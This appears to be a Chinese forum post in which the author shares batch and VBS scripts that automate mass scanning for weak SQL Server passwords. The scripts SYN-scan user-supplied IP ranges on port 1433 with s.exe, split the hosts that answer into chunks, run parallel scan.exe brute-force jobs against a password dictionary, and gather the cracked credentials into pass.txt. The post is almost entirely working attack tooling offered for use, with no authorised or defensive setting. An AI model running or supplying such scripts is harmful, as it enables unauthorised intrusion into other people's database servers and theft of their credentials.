自己写的一个sqlserver弱口令扫描工具辅助脚本(提升扫描速度效率,速度极快)
需要s.exe 和scan.exe不懂的就别看了。
下面是bat配套和vbs配套脚本
单进程多线程版:
@echo off
setlocal enabledelayedexpansion
@cd /d "%~dp0"
:start
Title 第一步--多线程扫描端口中
Rem IP段文件名
set /p IPlist= 输入你要扫描的ip表文件:
Rem 分割后的存放目录
@set Dname=list
Rem scan.exe 扫描进程数
set /a pn=4
if exist %IPlist% (goto next) else (@echo 没有找到 %IPlist% 文件,按任意键退出 & pause & exit)
::--------------------------------------------进程快照------------------------------------------------
:next
::-------------------------------------第一步--多线程扫描端口中------------------------------------------
for /f "tokens=1,2 delims= " %%j in (%IPlist%) do s syn %%j %%k 1433 /Save
::----------------------------------------第二步--整理扫描结果---------------------------------------
Title 第二步--整理扫描结果
findstr /v /R ^Perf.* Result.txt>s1.txt
findstr /v /R ^Sca.* s1.txt>s2.txt
findstr /v /R ^L.* s2.txt>s3.txt
findstr /v /R ^N.* s3.txt>s4.txt
for /f "eol=- tokens=1 delims= " %%i in (s4.txt) do echo %%i>>ipst.txt
del s1.txt s2.txt s3.txt s4.txt result.txt
@rd /s /q %Dname%
@del list.txt
::-------------------------------------------去除重复-------------------------------------------------------
for /f "delims=" %%i in (ipst.txt) do (
if not defined %%i set %%i=s & @echo %%i>>ips.txt)
@del ipst.txt
::-------------------------------------------第三步--多线程扫描---------------------------------------
Title 第三步--多线程扫描
@if exist pass\. (@rd /s /q pass) else (@md pass)
@if exist log\. (@rd /s /q log) else (@md log)
@cscript.exe ip.vbs ips.txt scan 50
@del ips.txt
@for %%i in (scan\*.txt) do @echo %%i>>list.txt
::-------------------------------------------设置扫描进程数-----------------------------------------
set n=0
for /f %%i in (list.txt) do (
set /a n+=1
)
set /a max=n+%pn%
::一共有n行%n%
::一共有max行%max%
::--------------------------------------------for 循环------------------------------------------------
for /l %%i in (1,1,%pn%) do start for /l %%j in (%%i,4,%max%) do @if %%j gtr %n% (exit) else (scan -i scan\%%j.txt -p dic\sqlpass.dic -o pass\%%j.txt -l log\%%j.txt -c -t 600)
::------------------------------------判断是否扫描完毕----------------------------------------------
:wait1
@for /l %%i in (4,-1,1) do @ping -n 2 127.1>nul & cls & @echo ------------------------------------------------------ & @echo 请不要关掉本窗口 & @echo 每隔%%i秒程序会自动判断是否该进入下一步 & @echo ------------------------------------------------------
@tasklist | findstr "\<scan.exe\>">nul
@if %errorlevel% == 0 (goto wait1) else (goto next2)
:next2
@cls
@if exist scan\. (@rd /s /q scan)
@if exist log\. (@rd /s /q log)
@if exist list.txt (del list.txt)
::-----------------------------------------------搜集密码----------------------------------------------
@for %%a in (pass\*.txt) do @for /f "usebackq tokens=1,2" %%i in ("%%a") do @echo %%i %%j>>pass.txt
for /f "eol=D tokens=*" %%i in (pass.txt) do echo %%i>>passt.txt
del pass.txt
@if exist pass\. (@rd /s /q pass)
::-------------------------------------------去除重复-------------------------------------------------------
for /f "delims=" %%i in (passt.txt) do (
if not defined %%i set %%i=s & @echo %%i>>pass.txt)
@del passt.txt
@echo.>扫描完毕
多进程多线程版:
@echo off
setlocal enabledelayedexpansion
@cd /d "%~dp0"
:start
Title 第一步--多线程扫描端口中
Rem IP段文件名
set /p IPlist= 输入你要扫描的ip表文件:
Rem 分割后的存放目录
@set Dname=list
Rem scan.exe 扫描进程数
set /a pn=4
if exist %IPlist% (goto next) else (@echo 没有找到 %IPlist% 文件,按任意键退出 & pause & exit)
:next
@for /f %%l in (%IPlist%) do set /a znx+=1
@echo 扫描列表文件共有 %znx% 行
set /p Num= 输入文件最大行数:
::--------------------------------------------进程快照------------------------------------------------
if exist p.txt (@del p.txt)
@tasklist | findstr "\<cmd.exe\>">tmp.txt
@for /f "tokens=2 delims= " %%i in (tmp.txt) do echo %%i>>p.txt
::-------------------------------------第一步--多线程扫描端口中------------------------------------------
@if exist list.txt (del list.txt)
@cscript.exe ip.vbs %IPlist% %Dname% %Num%
@for %%i in (%Dname%\*.txt) do @echo %%i>>list.txt
for /f "eol=; delims= " %%i in (list.txt) do @start for /f "eol=; tokens=1,2 delims= " %%j in (%%i) do s syn %%j %%k 1433 /Save
::--------------------------------------------恢复快照------------------------------------------------------
@tasklist | findstr "\<cmd.exe\>">tmp.txt
if exist p2.txt (@del p2.txt>nul)
@for /f "tokens=2 delims= " %%i in (tmp.txt) do echo %%i>>p2.txt
@del tmp.txt>nul
@findstr /V /G:p.txt p2.txt>pp.txt
@for /f %%i in (pp.txt) do (
@taskkill /pid %%i /f>nul
)
@del p.txt,p2.txt,pp.txt
::------------------------------------判断是否扫描完毕----------------------------------------------
:wait
@for /l %%i in (4,-1,1) do @ping -n 2 127.1>nul & cls & @echo ------------------------------------------------------ & @echo 请不要关掉本窗口 & @echo 每隔%%i秒程序会自动判断是否该进入下一步 & @echo ------------------------------------------------------
@tasklist | findstr "\<s.exe\>">nul
@if %errorlevel% == 0 (goto wait) else (goto next1)
:next1
@cls
::----------------------------------------第二步--整理扫描结果---------------------------------------
Title 第二步--整理扫描结果
findstr /v /R ^Perf.* Result.txt>s1.txt
findstr /v /R ^Sca.* s1.txt>s2.txt
findstr /v /R ^L.* s2.txt>s3.txt
findstr /v /R ^N.* s3.txt>s4.txt
for /f "eol=- tokens=1 delims= " %%i in (s4.txt) do echo %%i>>ipst.txt
del s1.txt s2.txt s3.txt s4.txt result.txt
@rd /s /q %Dname%
@del list.txt
::-------------------------------------------去除重复-------------------------------------------------------
for /f "delims=" %%i in (ipst.txt) do (
if not defined %%i set %%i=s & @echo %%i>>ips.txt)
@del ipst.txt
::-------------------------------------------第三步--多线程扫描---------------------------------------
Title 第三步--多线程扫描
@if exist pass\. (@rd /s /q pass) else (@md pass)
@if exist log\. (@rd /s /q log) else (@md log)
@cscript.exe ip.vbs ips.txt scan 200
@del ips.txt
@for %%i in (scan\*.txt) do @echo %%i>>list.txt
::-------------------------------------------设置扫描进程数-----------------------------------------
set n=0
for /f %%i in (list.txt) do (
set /a n+=1
)
set /a max=n+%pn%
::一共有n行%n%
::一共有max行%max%
::--------------------------------------------for 循环------------------------------------------------
for /l %%i in (1,1,%pn%) do start for /l %%j in (%%i,4,%max%) do @if %%j gtr %n% (exit) else (scan -i scan\%%j.txt -p dic\sqlpass.dic -o pass\%%j.txt -l log\%%j.txt -c -t 600)
::------------------------------------判断是否扫描完毕----------------------------------------------
:wait1
@for /l %%i in (4,-1,1) do @ping -n 2 127.1>nul & cls & @echo ------------------------------------------------------ & @echo 请不要关掉本窗口 & @echo 每隔%%i秒程序会自动判断是否该进入下一步 & @echo ------------------------------------------------------
@tasklist | findstr "\<scan.exe\>">nul
@if %errorlevel% == 0 (goto wait1) else (goto next2)
:next2
@cls
@if exist scan\. (@rd /s /q scan)
@if exist log\. (@rd /s /q log)
@if exist list.txt (del list.txt)
::-----------------------------------------------搜集密码----------------------------------------------
@for %%a in (pass\*.txt) do @for /f "usebackq tokens=1,2" %%i in ("%%a") do @echo %%i %%j>>pass.txt
for /f "eol=D tokens=*" %%i in (pass.txt) do echo %%i>>passt.txt
del pass.txt
@if exist pass\. (@rd /s /q pass)
::-------------------------------------------去除重复-------------------------------------------------------
for /f "delims=" %%i in (passt.txt) do (
if not defined %%i set %%i=s & @echo %%i>>pass.txt)
@del passt.txt
@echo 扫描完毕,查看本目录下pass.txt密码。
pause
涉及到的vbs:
'最简单的VBS文本分割器
'作者: Yatere
'QQ:4699366
On Error Resume Next
If WScript.Arguments.Count <> 3 Then
WScript.Echo "Usage: Cscript.exe Exp.vbs 文件名 目录名 分割数"
WScript.Quit
End If
tname = WScript.Arguments(0)
dname = WScript.Arguments(1)
num = WScript.Arguments(2)
'num = 100 '每个文件最大条目数
'tname = "ip.txt" '待转换文件名
'dname = "ip" '目录名
Set fs =CreateObject("scripting.filesystemobject")
Set gs =CreateObject("scripting.filesystemobject")
Set f=fs.opentextfile(tname,1,true)
if fs.FolderExists(dname) then
fs.DeleteFolder(dname)
end if
set fd=fs.Createfolder(dname)
set fd=Nothing
n=0
do while f.atendofstream<>true
n=n+1
Dim data
Set g=gs.opentextfile(dname+"\"+CStr(n)+".txt",2,true)
'if f.atendofstream<>true then
for a=1 to num
if f.atendofstream<>true then
data=f.readline
g.writeline data
end if
next
'end if
loop
f.close
g.close
Set fs=Nothing
Set gs=Nothing